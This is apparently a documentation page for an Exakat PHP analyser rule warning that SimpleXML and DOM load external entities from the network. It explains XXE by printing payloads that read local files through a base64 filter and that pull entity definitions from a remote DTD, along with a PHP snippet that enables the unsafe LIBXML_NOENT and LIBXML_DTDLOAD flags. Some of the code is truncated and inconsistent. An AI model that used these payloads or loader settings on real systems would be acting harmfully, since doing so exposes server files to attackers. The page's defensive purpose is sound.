.. _security-nonetforxmlload: .. _no-net-for-xml-load: No Net For Xml Load +++++++++++++++++++ Simplexml and ext/DOM load all external entities from the web, by default. This is dangerous, in particular when loading unknown XML code. Look at this XML code below : it is valid. It defines an entity ``xxe``, that is filled with a file, read on the system and base64 encoded.:: <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> &xxe; This file could be processed with the following code : note, you can replace 'index.php' in the above entity by any valid filepath. Here, PHP tries to load the XML file, finds the entity, then solves the entity by encoding a file called ``index.php``. The source code of the file is not used as data in the XML file. At that point, the example illustrates how a XXE works : by using the XML `engine `_ to load external resources, and preprocessing the XML code. in fact, there is only one change to make this XML code arbitrarily injected ::: <!DOCTYPE replace [<!ENTITY writer SYSTEM "https://www.example.com/entities.dtd"> ]> &xxe; With the above example, the XML code is `static `_ (as, it never changes), but the 'xxe' definitions are loaded from a remove website, and are completely under the attacker control. .. code-block:: php loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); $info = simplexml_import_dom($dom); print base64_decode($info[0]); ?> See also `XML External Entity `_,, `XML External Entity (XXE) Processing `_ and `Detecting and exploiting XXE in SAML Interfaces `_. Connex PHP features ------------------- + `xml `_ Suggestions ___________ * Strip out any entity when using external XML * Forbid any network to the XML engine, by configuring the XML engine without network access Specs _____ +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Short name | Security/NoNetForXmlLoad | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Rulesets | :ref:`All `, :ref:`Changed Behavior `, :ref:`Security ` | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Exakat since | 1.0.11 | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | PHP Version | All | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Severity | Major | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Time To Fix | Slow (1 hour) | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Precision | High | +--------------+-------------------------------------------------------------------------------------------------------------------------+ | Available in | `Entreprise Edition `_, `Exakat Cloud `_ | +--------------+-------------------------------------------------------------------------------------------------------------------------+